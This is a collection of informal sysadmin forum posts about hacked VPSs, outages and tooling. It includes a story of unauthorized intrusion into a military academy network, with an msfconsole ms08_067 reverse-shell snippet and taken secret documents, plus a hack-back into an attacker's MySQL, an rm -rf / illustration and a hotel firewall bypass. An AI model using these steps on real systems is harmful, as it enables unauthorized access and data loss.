Funny story about the first time two of my servers got hacked. The fun part is how I noticed it.
So I purchased two new VPSs for proxy server goals and thought, 'I can set up fail2ban tomorrow, I'll be fine.'
Next day I wanted to install nginx, so I ran the command and it said that port 80 was already in use!
I was sitting there like no, that's not possible, I didn't install any server software yet. So I thought 'this can't be possible' but I ran 'pidof apache2' just to confirm. It actually returned a PID! It was a barebones Debian install, so I was sure it was not installed yet by ME. Checked the auth logs and noticed that an IP address had done a huge brute force attack and managed to gain root access. Simply reinstalled Debian and put fail2ban on it RIGHT AWAY.
Checked about two seconds later whether anyone had tried to log in again (iptables -L, and keep in mind that fail2ban's default config needs six failed attempts within, I think, five minutes to ban an IP) and I already saw that around 8-10 addresses were banned.
Was pretty shaken up but damn, I learned my lesson!
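(For anyone who wants to skip learning this the hard way: a basic fail2ban setup really is only a few minutes of work. A rough sketch for a stock Debian box; the jail name and defaults vary by version, so treat the values as illustrative:)

```
# install and tighten the defaults a bit
sudo apt-get install -y fail2ban

sudo tee /etc/fail2ban/jail.local > /dev/null <<'EOF'
[sshd]
enabled  = true
maxretry = 3
findtime = 300
bantime  = 3600
EOF

sudo systemctl restart fail2ban

# check who has already been caught
sudo fail2ban-client status sshd
sudo iptables -L -n | grep -i f2b
```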
[This makes me sound really bad at first, please read the whole thing]
Back when I first started freelancing I worked for a client who ran a game server hosting company. My job was to improve their system for updating game servers. This was one of my first clients and I didn't dare question the fact that he had me working on the production environment, as they didn't have a development one set up. I came to regret that decision when, out of nowhere during the first test, files just started deleting. I panicked as one would and tried to stop the webserver it was running on, but oh no, he hadn't given me access to any of that. I thought, well shit, I might as well see where I fucked up, since it was midnight for him and I wasn't able to get a hold of him. I looked at every single line hundreds of times trying to see why it would have started deleting files. I found no cause.

Exhausted (this was 6am by this point), I pretty much passed out. I woke up around 5 hours later with my face on my keyboard (I know you've all done that) only to see a good 30 messages from the client screaming at me. It turns out that during that time every single client's game server had been deleted. Before responding and begging for forgiveness, I decided to take another crack at finding the root of the problem. It wasn't my fault. I had found the cause! It turns out a previous programmer had a script that would run "rm -rf" + (insert file name here) on the old server files, only he had fucked up the line and it would run "rm -rf /". I have never felt more relieved in my life. This script had been disabled by the original programmer, but the client had set it to run again so that I could remake the system. Now, I was never told about this specific script, as it was for a game they didn't host anymore.
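(For the curious: the following is a hypothetical reconstruction of how that kind of line goes wrong, not the actual script. One empty variable is all it takes.)

```
#!/bin/bash
# BROKEN: if GAME_DIR is unset or empty, this expands to `rm -rf /`
rm -rf "$GAME_DIR/"

# SAFER: abort on unset variables and refuse an empty expansion outright
set -u
rm -rf "${GAME_DIR:?GAME_DIR is not set}/"
```

(Modern GNU rm at least refuses a bare `rm -rf /` without --no-preserve-root, but variants like `rm -rf "$DIR"/*` still go through.)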
I realise this is getting very long so I'll speed it up a bit.
He didn't want to take the blame and said I had added the code and it was all my fault. He told me I could either do live chat support for 3 months at his company or pay $10,000. Out of all of this I had at least made sure to document what I was doing and back up every single file before I touched them, which managed to save my ass when it came to him threatening legal action. I showed him my proof, which resulted in him trying to guilt trip me into working for him for free, as he had lost about 80% of his clients. By this point I had been abused constantly for 4 weeks by this son of a bitch. As I was underage, he said that if we went to court he'd take my parents' house and make them live on the street. So how does one respond? A simple "Fuck off you cunt" and a block.
That was over 8 years ago and I haven't heard from him since.
If you've made it this far, congrats, you deserve a cookie!
Navy story continued.
And continuing from the arp poisoning and boredom, I started scanning the network...
So I found plenty of WinXP computers, even some Win2k servers (I shit you not, the year was 201X). I decided to play around with metasploit a bit. I mean, this had to be a secure net, right?
Like hell it was.
Among the select douchebags I arp poisoned was a senior officer who had a VERY high opinion of himself and also believed he was tech-savvy. Now that is a combination that is like a red rag to a bull for assholes like me. But I had to be more careful, as news of the network outage leaked and rumours of "that guy" ran amok; but because the whole sysadmin thing was on the shoulders of one guy, no one could explicitly track it to me. Not that I cared, actually; when I am pissed I act with all the subtleness of an atom bomb on steroids.
So, after some scanning and arp poisoning (changing the source MAC address this time) I said...
"Let's try this common exploit, it supposedly shouldn't work, there have been notifications about it, I've read them." Oh boy, was I in for a treat. 12 meterpreter sessions. FUCKING 12. The academy's online printer had no authentication, so I took the liberty of printing a few pages of ASCII jolly rogers (cute stuff, I know, but I was still in ITSec puberty) and decided to fuck around with the other PCs. One thing I found out is that some professors' PCs had the extreme password of 1234. Serious security, that was. Had I known earlier, I could have skipped a TON of pointless memorising...
Anyway, I was running amok the entire network, the sysad never had a chance on that, and he seemed preoccupied with EVERYTHING ELSE besides monitoring the net, like fixing (replacing) the keyboard for the commander's secretary, so...
BTW, most PCs had antivirus, but SO out of date that I didn't even need to encode the payload or do any other trick. An LDAP server was open, and the hashed admin password was the name of his wife. Go figure.
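(For context: "firing" that kind of module from msfconsole looks roughly like this. The module and payload names are the real public ones; the addresses are placeholders.)

```
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOST 10.0.0.42
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 10.0.0.7
msf > exploit
```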
I looked at a WinXP laptop with a weird name and fired my trusty ms08_067 at it. Password: "aaw". I seriously thought that Ophcrack was broken, but I confirmed it. WTF? I started looking into the files... nothing too suspicious... wait a min, this guy is supposed to work, so why is his browser showing porn?
Looking at the ""Deleted"" files (hah!) I found a TON of documents with "SECRET" in them. Curious...
Decided to download everything, like the asshole I am, restart his PC, AND leave him with another desktop wallpaper and a text message. Hoping he'd take the hint, I told the sysadmin about the vulnerable PCs and went to class...
In the middle of the class (I think it was anti-air warfare or anti-submarine warfare) the sysad burst through the door shouting "Stop it, that's the second-in-command's PC!".
Stunned silence. Even the professor (who was an officer). God, that was awkward. So, to make things MORE awkward (like the asshole I am) I burned every document to a DVD and the next day I took the sysad and went to the second-in-command of the academy.
Surprisingly, he took the whole thing in quite an easygoing fashion. I half-expected a court martial or at least a good yelling, but no. Anyway, after our conversation I cornered the sysad and barraged him with a ton of security holes, needed upgrades, settings, etc. I still don't know if he managed to patch everything (I left him a detailed report) because, as I've written before, budget constraints in the military are the stuff of nightmares. Still, after that, oddly, most people wouldn't even talk to me.
God, that was a nice period of my life, not having to pretend to be interested about sports and TV shows. It would be almost like a story from highschool (if our highschool had such things as a network back then - yes, I am old).
Your stories?
In this day and age, what's my fucking excuse for not using a VPN full-time on my phone as well (next to my laptop)?
I do way more personal stuff on my phone anyway, and add to that that I've got access to at least three self-managed VPN servers...
Yup, going full VPN from now on.
!!rant
When I worked at a previous job, they only gave out decent titles (and salaries) to upper management. Everyone else... well... I was the Domain/Sysadmin, responsible for the domain and both DCs, upgrading the physical network (plus recabling it: the MDF was a *disaster*), as well as all backups, migrations, printers, servers, and workstations/lappys in the building, plus pushing software, antivirus, updates, security policies, etc. I had complete access to everything, and ofc was responsible for everything. Nothing on my network caused anyone (else) any trouble except one particular printer I wasn't able to replace. Also, nothing new appeared on my network without me noticing and tracking it down.
But my official title? "IT Assistant".
I made $11/hr.
Worth it? Take a flying leap into an overflowing outhouse during the height of a Vegas summer if you even begin to think so.
I eventually managed to switch to a developer position, and (after several attempts) got a ~$5/hr raise. They replaced me in IT with some ditz who had never installed an OS before, didn't know what the BIOS was, and couldn't figure out why a monitor... plugged into itself... wasn't working. Things went downhill from there.
Here's the story of my first month at CERN :) But first, a little premise...
Before arriving, I expected to be scared, alone and unguided in most of my experiences: after all I was a simple 19 year old about to leave home and friends for 3 years heading out in the world with zero experience on stuff like banking, taxes.. let alone working in a huge environment! The impostor syndrome was at an all time high on that front.
Then, I had the luck and pleasure to find an extremely competent and helpful plethora of people, ranging from my team to other CERNies (yes, that's how we're called :P), who took me under their wing and introduced me to all the key aspects of living there. When the initial stress finally settled thanks to this, I started to focus more and more on my work, following my teammates day by day as they taught me the core aspects of the system and the many projects in progress during Long Shutdown 2. Within a couple of weeks I had already grasped various concepts that got me quickly on track, and now I've managed to develop and integrate new temperature monitoring scripts into a system checking on hundreds of Single Board Computer-based servers :) It's a real rollercoaster of learning and applying on all fronts, and so far I don't regret my choice to leave.
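(I obviously can't paste the real scripts, but the heart of that kind of SBC temperature check is tiny. A hypothetical sketch; the sysfs path is the standard Linux one, the threshold is made up:)

```
#!/bin/sh
# read the SoC temperature (millidegrees C on most ARM boards)
ZONE=/sys/class/thermal/thermal_zone0/temp
LIMIT=70000   # 70.0 C

TEMP=$(cat "$ZONE")
if [ "$TEMP" -gt "$LIMIT" ]; then
    echo "$(hostname): $((TEMP / 1000)) C - too hot" >&2
    exit 1
fi
```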
Luckily I've also discovered I'm pretty efficient and good at my job, which surely boosts my morale :D
Keep you updated as usual!
An important message:
PrOpErLy managing servers is HARD.
I get pissed off at customers with ZERO server knowledge who think they can manage their VPS. “Just get a control panel and a VPS” from some flashy provider that makes server management look way too easy.. Clicking around in their fancy control panel, until:
- they need help with their *self-managed* VPS;
- their email ends up in spam;
- they suffer from performance issues;
- they need to restore a backup;
- something breaks, because YES, things break
Way too few people are able to answer:
- when and how do you make backups?
- how do you monitor your servers and which services?
- how do you keep track of trend analysis?
Then I come by with the necessary software: SNMP for trend analysis, Graphite for infrastructure health, Sensu for monitoring, Kibana, Ansible for configuration management..
Things that servers need but that customers have never even heard of.. because they can do everything in their control panel..
Until they come crying to me because it broke and they don’t even know how to get into SSH.
I think the ones to blame are VPS providers that tell the tale of how easy it is to install a control panel and never look at your server again.
Customers become responsible for something *business-critical*! Yet they don't know how it works.
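(For reference: even the laziest acceptable answer to "when and how do you make backups?" is a cron job plus an offsite copy. A sketch; paths, hosts and retention are made up:)

```
# /etc/cron.d/backup -- nightly at 03:00
0 3 * * * root /usr/local/bin/backup.sh

# /usr/local/bin/backup.sh -- dump, ship offsite, keep 14 days locally
#!/bin/bash
set -euo pipefail
STAMP=$(date +%F)
mysqldump --all-databases | gzip > "/var/backups/db-$STAMP.sql.gz"
rsync -a /var/backups/ backup-host:/srv/backups/$(hostname)/
find /var/backups -name 'db-*.sql.gz' -mtime +14 -delete
```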
So probably about a decade ago at this point I was working for free for a friend's start-up hosting company. He had rented out a high-end server in some data center and sold out virtualized chunks to clients.
This is back when you had only a few options for running virtual servers, but the market was taking off like a bat out of hell. In our case, we used User-Mode Linux (UML).
UML is essentially a kernel hack that lets you run the kernel in user space. That alone helps keep things separate or jailed. I'm pretty sure some of you can shed more light on it, but that's as I understood it at the time and I wasn't too shabby at hacking the kernel when we'd have driver issues.
Anyway, one of the ways my friend would on-board someone was to generate a new disk image file, mount it, and then chroot to that mount path. He'd basically use a stock image to do this and then wipe it out before putting it live.
I'm not sure exactly what he was doing at the time, but I got a panicked message on New Years Day saying that he had deleted everything. By everything, he had done an rm -fr /home as root on what he had thought was the root of a drive image.
It wasn't an image. It was the host server.
In the stroke of a single command, all user data was lost. We were pretty much screwed, but I have a knack for not giving up - so I spent a ton of time investigating Linux file recovery.
Fun fact about UML - since the kernel runs in user space as a regular ol' process, anything it opens is attached to that process. I had noticed that while the files were "gone", I could still see disk usage. I ended up finding the images attached to the file pointers associated with each running kernel - and thankfully all customers' VMs were still running at the time.
The next part was crazy, and I still think it's crazy. I don't remember the exact command, but I had to essentially copy the image from the referenced path into a new image file, then shut down the kernel and power it back on from the new image. We had configs all set aside, so that was easy. When it finally worked I was floored.
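(I still don't remember the exact incantation, but the generic shape of the trick on any Linux box is this; the PID and fd number are examples:)

```
# find which fd of the still-running UML kernel process points
# at the deleted image
ls -l /proc/12345/fd | grep deleted
# lrwx------ ... 7 -> /vm/images/customer1.img (deleted)

# copy the still-open data out into a fresh image file
cp /proc/12345/fd/7 /vm/images/customer1-recovered.img
```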
Rinse and repeat, I managed to drag every last missing bit out of /proc - with the only side effect being that all MySQL databases needed to be cleaned up.
!rant/story
I feel so great after switching from Windows 10 to (GNU/(REEE))Linux Kubuntu.
No more annoying, redundant programs that can't be quit.
It is like having a rooted phone. I am the god and not Microshit.
I am free. It feels so relaxing.
Sure, while setting this new system up I broke a lot of things (even with years of prior knowledge of Linux servers), but I finally managed to finish it.
I've accomplished something I thought I'd never do.
I convinced my boss to switch from SVN to Git. (Before SVN we'd even been using CVS, if anyone remembers that.)
Only requirement: it needs to stay in house and I'm the one setting up the server, writing documentation and teach everyone how to use it.
What? Why should I set up the server? Don't we have someone whose job it is to... OK, ok... I'll do it.
So after some painstaking arguments with the guy whose job it should have been, I managed to install a virtual machine running GitLab.
Long story short: I've just found out about the joys of mail configuration to send E-Mails to established mail providers. Every... single... one of them has a different problem with the way the mails are sent.
Fml
I think I'm going to ask that guy again about using our mail server's SMTP. There should be a way to use my GitLab's domain for that somehow.
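(In case anyone lands here with the same problem: on an Omnibus install this boils down to a few lines in /etc/gitlab/gitlab.rb followed by `sudo gitlab-ctl reconfigure`. Hostnames are placeholders:)

```
# /etc/gitlab/gitlab.rb
gitlab_rails['smtp_enable'] = true
gitlab_rails['smtp_address'] = "smtp.internal.example"
gitlab_rails['smtp_port'] = 25
gitlab_rails['smtp_domain'] = "gitlab.example.com"
gitlab_rails['gitlab_email_from'] = "gitlab@example.com"
```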
Really looking forward to Monday. Ugh...
Once upon a time, one or two jobs ago, a really awesome engineer specced out a distributed search application in response to a business need. This company was managed pretty oldschool and required a ton of paperwork and approvals.
The engineer spent many weeks running tests and optimizing the hell out of this app cluster. It flew, and he had the data to prove it could handle production workloads (think hundreds of terabytes of data being processed every single day)
Part of the way he achieved this was having RAID0 on all of the servers to maximize I/O throughput. He didn't care much about data loss, since the application itself was fault tolerant on a much more granular level.
Management, hearing about this, absolutely flipped their shit and demanded RAID6 instead. This despite the conclusive data that the engineer had that proved RAID6 couldn't keep up.
He more or less got told to STFU.
All this despite the fact that a RAID restripe would actually take many times longer than rebuilding a failed node from scratch (a process that took about 30 minutes by hand, and could probably have been automated down to less than five), causing longer exposure to actual data loss for the length of the days-long array rebuild.
The ill-thought-out requirement added about 50% to the cost of the project (*many* more hard drives now required), beyond the original budget, and the subsequent bureaucratic wrangling resulted in a late product launch.
6 months or so later, after real customers were using this product, the app was buckling under around half of its expected workload. A friend of the engineer suggested to management to try RAID0. Sure enough, that resolved the I/O bottleneck.
This rage-inducing story has a happy ending, though! Said engineer left the company not long after this incident, citing it as a reason for his departure. He was immediately hired by another company, making integer multiples of his prior salary.
The product the company botched the launch of by ignoring his spec? It died a few months later. Maybe the poor customer experience was to blame? Maybe the late launch? Maybe it was another reason entirely.
Either way, millions of dollars of hardware now sat fallow. This was a black eye on the company all the way up to the C-level.
tl;dr: Listen to your engineers. You hired them for their expertise.
I really wanna share this with you guys.
We have a couple of physical servers (yeah, I know) provided by a company owned by a friend of my boss. One of them, which I'll refer to as S1, hosted a couple of websites based on Drupal 7... Long story short, every PHP file got compromised after someone used a vulnerability in D7's core to inject malicious code. Whatever, wasn't a project of mine, and no one bothered to do anything about it... The client was even happy about not doing anything about it. We did stop making backups of those websites however, to avoid spreading the damage (right?). So, no one cared about this for months!
But last Monday? The physical server was offline. I powered it on again via its web management interface... Dead after less than an hour. No backups. Oh well, I guess I could keep powering it on to check what's wrong with it and attempt to fix it...
That's when I learned how the web management interface works: power on/reboot requests prompted actual workers to reach the physical server and press the power on/reboot buttons.
That took a while to sink in. I mean, ok, they are physical servers... But aren't they managed somehow? They are just... Whatever. Rebooting over and over wasn't the solution, so I asked if they could move the HDD to another of our servers... The answer was that it required buying a "server installation" package. In short, we'd have had to buy a new physical server, or renew the subscription of one we already owned for 6 months.
So... I've literally spent the rest of the day bothering their employees to reboot S1, until I reached the "daily reboot requests limit" (which amounts to 3 requests. seriously), which magically opened a support ticket where a random guy advised me to stop using VNC as "the server was responsive" and offered to help me with the command line.
Fiiine, I sort of appreciate it. My next message was a kernel log showing that the OS died because physical components became unavailable after a while, and that S1 lacked a VNC server, being accessible only via ssh. So, the daily reboot limit was removed for S1. Yay.
...What to do though? S1 was down, we had no backups, and asking for a manual reboot every time was slow as Hell. ....Then I went insane. I asked for 1 more reboot. su. crontab -e. */15 * * * * /sbin/shutdown -r +5. while true; do rsync --timeout=20 --append S1:/stuff .; sleep 60; done
It worked. We now have access again to 4 hacked, shitty Drupal 7 websites. My boss stopped shouting. I can get back to my own projects.
Apparently, those D7 websites got back online too, still with malicious php code within them. Well, not my problem (for now).
Meanwhile, S1 is still rebooting.
We just got into a malicious bot's database with root access.
So GuardDuty gave us some warnings for our Tableau server. After investigating, we found an IP that was spamming us, trying all sorts. After trying some stuff we managed to access their MySQL database; root/root logged us in. Anyway, the database we just broke into seems to have schemas not only for the bot but also for a few Chinese gambling websites. There are lots of payment details on here.
Big question: who do we report this to, and what's the best way to do so anonymously? I'm assuming the malicious bot has just hijacked the server for these gambling sites, so we won't touch those, but dropping the schema the bot is using is also viable. However, it has a list of other IPs; trying those, we found more compromised servers which we could also log in to with root/root.
This is kinda ongoing, writing this as my coworker is digging through this more.
Working with DigitalOcean boxes for so long has spoiled me.
I went to setup something on my home server today, and couldn't figure out what I was doing wrong for like 30 minutes...
Until I realized that I never forwarded port 80.
*sigh.
I installed my first Windows servers in AWS today. And now #awsdown is trending on Twitter. I finally managed to break the internet 😳
4th grade. My parents left for the night and got a babysitter for me and my younger siblings. The babysitter showed me a game she liked in IE. You could make an account, raise a digital pet (a "neopet"), and play flash games for points to buy items from other users, who listed them in their own stores with custom CSS/HTML, including background music. This was the first time I had really seen what the web could look like. Animated tiled gif backgrounds amazed me, so I took to Google, through which I discovered sites where one could copy CSS and HTML snippets for themes. I stored each new HTML tag I discovered via w3schools.com in a PowerPoint, where the snippets I found were pasted somewhere randomly. From there I learned HTML, CSS, and a billion other things. To date I've made websites and apps in several languages on Windows/Linux/OSX/Android (but not iOS yet). I've managed servers, databases, and DNS records. I've even run a website with 100k requests a day.
All the Linux servers I manage:
Uptime 300+ days
All the Linux servers I manage inside Hyper-V, managed by our IT:
Uptime max 7 days...
Wtf? Do you really have to restart the host machine once a week?
It took me like 3 years at my company to get this huge-ass client to ask us to remake their website (the client is already our client for other purposes).
The old website was hosted on their local machine, behind a proxy that sat in front of 30 other website servers.
The old website took like 30-40 seconds to load in a browser and had a Google score of 3-6/100.
We made the new website in WordPress, since it was basically a blog, and set up all of the older links to redirect to the new pages so that SEO wouldn't be affected.
We then asked the previous developers to let their domain redirect to the new one (it was like example.com => ex.example.com and now it's just example.com, so we needed them to make ex.example.com redirect to example.com).
What they did was redirect it to the 404 page of the new website, making everything go to fuck itself.
Damn this might be the first time I despise other developers, but this move was fucking awful.
I mean, I get it, we stole your big client, but it's not our fault if we made the Google score go up to 90/100 in a week just by changing server and CMS.
I am at a hotel and these fuckers are blocking outbound connections to port 22. They are also blocking access to any websites mentioning proxies or VPNs; seriously, fuck them. I managed to get a VNC connection open to one of my servers and I am now trying to set up a VPN tunnel to my servers so I can fucking do my work. >:-(
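(The escape hatch that usually works, assuming you control a server with a spare port: hotels rarely block 443, so let sshd listen there too.)

```
# on the server, in /etc/ssh/sshd_config (assumes nothing else owns 443)
Port 22
Port 443

# from the hotel; -D also gives you a SOCKS proxy to tunnel through
ssh -p 443 -D 1080 user@myserver
```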
TL;DR Dear boss, firstly, you always get someone to review anything important done by a fucking intern.
Secondly, you do not give access to your fucking client's production server to an intern.
Thirdly, you don't ask your fucking intern to test the intern's work that has not been reviewed by anyone directly on your client's fucking production server.
Last week, the boss and one of the lead devs (the only guy with some serious knowledge of systems and networking) decided to give me (an intern who barely has any work experience) the task of fixing, or finding an alternative solution to, how their support team accesses client machines. Currently they use a reverse SSH tunnel and an intermediary VH, but for some reason that was very unreliable in terms of availability. I suggested using OpenVPN and explained how it would work. It seemed a far better idea and they accepted. After several days of working through documentation and guides, I figured out how OpenVPN works and managed to deploy a TEST server and successfully test remote access using two VMs.

On seeing my tests, the boss told me he wanted to test it on the client network. I agreed. Today he comes to me, tells me to prepare testing for tomorrow and that the client technician is going to give me access to one of their boxes. And then he adds, "It's a working prod server. We'll see if we can make it work on that," and leaves. I gaped at him for a while and asked another dev in the room if what I had heard was right. He confirmed. Turns out the lead dev and the boss's son (who also works here) had had a huge argument since morning on the same issue, and finally the dev guy had washed his hands of it and declared that if anything goes wrong from testing on production, it's entirely the boss's own fault. That's when the boss stepped in and approached me. I ran back to his office and began to explain why prod servers don't top the list of things you can fuck around with. But he simply silenced me, saying, "What can go wrong?" and added, "You shouldn't stay still. You should keep moving." Okay, like, firstly what the fuck, and secondly, what the fuck?
Even though the OpenVPN client is not the scariest thing to install, tomorrow's going to be fun.
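(For reference, a bare-bones OpenVPN server config is genuinely small; a minimal sketch along the lines of the official examples, with paths and subnet as placeholders:)

```
# /etc/openvpn/server.conf
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh2048.pem
server 10.8.0.0 255.255.255.0
keepalive 10 120
persist-key
persist-tun
```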
!coding
I used to be a sysadmin, which meant I was in charge of quarterly server patching. My team managed about 2500 servers running various flavors of Linux and legacy Unix. The vast majority (95% or more) ran Linux (SLES). Our maintenance window was always overnight (10pm to 6am), so at the stroke of 10pm a massive cascade of patching commands would go out to hundreds of servers.
Before I was brought into the process, it relied on the automation product mgmt tasked us with using: BigFix. It's a real piece of shit. Though we had 2500 or so servers, this environment was dominated by Windows. All our vCenter servers ran it, and more importantly, our BigFix nodes were all Windows machines. That meant that while we were trying to patch, the BigFix servers would get patched by the Windows team. This caused lots of failed and timed-out patching, because the Windows admins never quite understood that taking down the automation infrastructure would cause problems.
As such, I got tired of depending on a bunch of button-pushing checkbox-clickers who didn't know shit about shit, so I started writing an ssh-wrapped patching system. By the time I left for my current job, patching had been reduced to a single command to initiate each group's patching and reboots, plus an easy check to see when servers come back up. So usually, the way it worked out was that I would send patching orders to 750 machines or so, and within about 5 minutes they would all be done patching; within another 20 minutes, all but about 5 of the ones that required rebooting would be done.
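(Not the actual code, but the skeleton of that kind of fan-out is roughly this; SLES patching goes through zypper, and root SSH keys are assumed:)

```
#!/bin/bash
# patch-group.sh <hostlist>: fire patching at every host in parallel
mkdir -p logs
while read -r host; do
    ssh -o BatchMode=yes "root@$host" \
        'zypper --non-interactive patch; reboot' \
        > "logs/$host.log" 2>&1 &
done < "$1"
wait   # minutes later, the logs tell you who needs a second look
```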
The "all-nighter", which happened every time, was waiting for the Oracle servers to run timed fscks against a dozen or so large filesystems per server, because they were all on ext3/4, which eats complete shit. Then, several hours later, as they finished, I would have to call the DBAs to tell them to validate their shitty servers.
About slightly more than a year ago I started volunteering at the local general students committee. They desperately searched for someone playing the role of both political head of division as well as the system administrator, for around half a year before I took the job.
When I started, the data center was mostly abandoned, with most of the computational power and resources just lying around unused. They already ran some KVM hosts with around 6 virtual machines, including a cloud service, internally used shared storage, a user directory, 10 workstations, and a Wi-Fi network. Everything except one virtual machine ran on GNU/Linux systems and was built on open source technology. The administration was done through shared passwords, bash scripts, and instructions in an extensive MediaWiki instance.
My introduction into this whole eco-system was basically this:
"Ever did something with linux before? Here you have the logins - have fun. Oh, and please don't break stuff. Thank you!"
Since I had only managed a small personal server before, and had learned about networking, IT-sec and administration only from university courses, I quickly shaped a small team eager to build great things and bring in the knowledge necessary to create something awesome. We had a lot of fun diving into modern technologies, discussing the future of this infrastructure, and simply trying things out and failing hard while implementing those ideas.
Today, a year and a half later, we look at around 40 virtual machines spiced with a lot of magic. We host several internal and external services like cloud, chat, ticket-system, websites, blog, notepad, DNS, DHCP, VPN, firewall, confluence, freifunk (free network mesh), ubuntu mirror etc. Everything is managed through a central puppet-configuration infrastructure. Changes in configuration are deployed in minutes across all servers. We utilize docker for application deployment and gitlab for code management. We provide incremental, distributed backups, a central database and a distributed network across the campus. We created a desktop workstation environment based on Ubuntu Server for deployment on bare-metal machines through the foreman project. Almost everything free and open source.
The whole system now is easily configurable, allows updating, maintenance and deployment of old and new services. We reached our main goal for this year which was the creation of a documented environment which is maintainable by one administrator.
Although we did this in our free time without any payment, it was a great year with a lot of experience, which pays off now.
A little update after yesterday's catastrophe:
No catastrophe today (so far). Managed to clear some space on the servers, and the backup ran correctly overnight.
Also...and I'm still checking this... but I think I've just received a pay rise.
wait....is today...a good day?
Not really a rant and not very random. More like a very short story.
So I didn't write any rant regarding the whole Microsoft GitHub topic. I don't like to judge stuff quickly. I did participate in a few threads though.
Another thing is I also don't use GitHub very much, apart from giving 🌟 to repos as a bookmark. Have one hobby project there. That's all. So I don't worry that much. I'm that selfish and self-concerned. :3
I was first introduced to version control systems by learning how to use TortoiseSVN around 2008. We had a group project, and one of the guys was an experienced and amazing programmer, unlike the rest of us. He was doing commercial projects while we were in our 1st and 2nd year. The uni had an SVN repo server. He taught us about TortoiseSVN. He also had Basecamp and taught us how to use it as well. So that's how I learned the benefits of using versioning tools and project management tools. On a side note, our uni didn't teach any of those in detail :3
After that project I was hooked on versioning tools. So until school kicked me out, I was able to use their SVN server. When I was on my own, I had to ask Google for help. I found a new world. There are still free SVN services that I can use with certain limited functions. But that's not the new world; I found people saying how Git is better than SVN in various ways. This was around 2010-2011.
At first I was a bit reluctant to touch Git because of the whole commands-in-a-terminal approach. But then I found that there is TortoiseGit. I still thank the TortoiseSVN creator for that. I'm a sucker for GUI tools. So then I also had to pick which Git server to use. Hell yeah, self-hosted GitLab is the way to go, man. Well, that's what the internet said. So I listened. I got it up and running after much trial and error. I used it briefly. Then I came back to my country around 2012-2013; the land of kilobytes per minute (yes, not second, minute).
My country's internet only improved after 2016. So from 2013 to 2016 I did my best not to rely on the internet. I wasn't able to afford a server at my less-than-10-people, 12ft*50ft office. So I had to find an alternative to GitLab, preferably one that ran on Windows. Found Bonobo and it was alright. It worked. Well, we had crazy moments here and there when the PC running Bonobo got a virus and stuff. But we managed. We survived. Then finally multinational telecom corporations came to our country.
We got cheaper and faster mobile data, broadband, and fiber plans. Finally I can visit pornhub ... sorry, GitHub. GitHub is good. I like it. But that doesn't mean I should share my ugly mutated projects with the rest of the world. I could keep using Bonobo, but it has risks. So I had to think of an alternative. I remembered that GitLab didn't have a cloud hosting service when I checked them out in the past. So I just looked into Bitbucket and was happy with their free plan of 5 users and unlimited private repos. I am very, very cheap and broke.
That's why I said at the beginning that I don't really care that much about the whole M$GitHub topic. However, due to that topic, I visited the GitLab website again and found out they have cloud hosting now, and their free plan is unlimited users and unlimited repos. So hell yeah. Sorry BB. I am gonna move to a cheaper and wider land.
TL;DR: I am gonna move to GitLab because of their free plan.
Today was not my sharpest day, but I managed to sit eight hours in this chair with a laptop leaning on my arm. It's very comfortable.
I made a regex interpreter. Three versions. The first one was nicely programmed and functional, but I found out it was 16 times slower than the clib one (at least!). Then I saw how extremely fast the clib one is and realized that the compiling-to-bytecode they do is extremely effective. So I wrote my own bytecode compiler that is faster than theirs, and the second version was born. After abusing that thing to find out what kind of speeds I could get out of it, it became very unmaintainable, beyond rescue. So I made a third version, and this one is very performant. It supports [abc]{3} (duplicating the group three times), for example. It supports 0-9 and a-z, which convert to 'd' and 'a' (shorter for speed). It converts [a0-9a-z]{3} to [lada][lada][lada]. The bytecode is not many times smaller than the source, but not having to think suits the interpreter very well. It's blazing fast.
I wish I could do something like this for a living. Develop a language, or socket servers. Tired of Python (great language, but boring).
Thanks for listening to my tedtalk
Someone's guts will be torn out tomorrow and put up on a nice clean razor barbed wire ...
I was wondering what the fucking fuck messed up my brain - till I realized that some dev mixed up the timezone on one of our servers. Dunno how the dev managed it - but the end result was not funny.
Due to the difference in time strings the newer backup had an older timestamp - and vice versa.
Which - when you want to do mass clean up and migration - is a very fucked up thing.
I had to manually check dozens of backups to make sure I got the right ones...
-.- knife goes in, gut goes out. Thx Bart Simpson.
It was back in the old days, when I was working with Java and Windows systems.
Java and different log4j versions across dependencies caused the system to break only on the production server.
It turned out some of the libraries had log4j embedded, which conflicted with the other log4j.
It worked on all computers except the production one.
Actually, that was my main reason to switch my career to Python after that dependency hell.
Another one was Windows Server 2008's TCP connection limit being set to 200 or something.
We needed to change the registry to get our servers working. After this case we finally managed to convince people to switch to Linux.
Anyway, any non-standard error is hard when you've got multiple layers communicating with each other; practice makes it easier to solve those problems, and your success moment comes faster.
Hello, world!
Okay, guys and gals... I need your creative minds. I need a concept for sort of a property manager for my game.. I have an idea of my own, feel free to tear it apart or throw it out the window.
So basically.. You'll no longer have one Computer System (and you won't instantly hit the login screen for that System on startup). Instead, you'll have a lot of things. They will probably only be represented using text and menus (likely no 3D or 2D environments or anything.. Though a setup like News Tycoon would be epic, I think that would be too much for this game.) You'll basically start off with a small space (probably a basement) with x amount of free space. In that space, you'll need to add things like a desk, chair, and a laptop, or tower + monitor. You can also buy things like server rigs with a ton of space, but those are pricey and bulky. Each item costs X amount and takes up X amount of space. Also, you'll need a desk for a monitor (or multiple..) and other things.. (Like your rubber duck collection ;P JK) You can also rent and manage servers. (Renting is more expensive in the long run, but things on your server are not on your property. But if you own a server on your property, you can rent space to NPCs.) As well as manage your devices, properties, stocks, etc..
Also, there will be in-game time. Depending on how "comfortable" you are will determine how long you can stay up in a day. In-game events will take place later on at specific times, so staying up (or not..) will need to be managed well. Especially if you're being targeted by a rival (NPC) hacker.
Another attempt of mine to write something in Rust; I wanted to try Tauri, as it's a promising competitor to Electron.
Why use Tauri and not Electron?
Cause in Tauri you can write Rust plugins that you can interact with directly from JavaScript, without stupid HTTP servers, code mangling and stuff.
From the JavaScript side you only call one method and pass an object with arguments into it.
So it took me an entire weekend to create a draft plugin to interact with an SQLite database.
Tauri's documentation is inconsistent. I understand that, cause it's a young project and the plugin architecture changed frequently.
Moreover, my knowledge of Rust is near zero. But overall it was worth it. I like what I achieved.
I can pass a SQL query and execute it inside a mutex-guarded singleton. Like I said before, I like it cause I can call my plugin directly from JavaScript.
I know I wasn't fancy with my implementation. I just created the file database connection from a JSON configuration and managed to receive string SQL statements. For now I just print the results to the console from Rust.
I will add sending back results later this week.
For me Tauri is already better than Electron, cause the code is clear and there are no workarounds (except the singleton with the connection, cause of the limitations of my Rust knowledge).
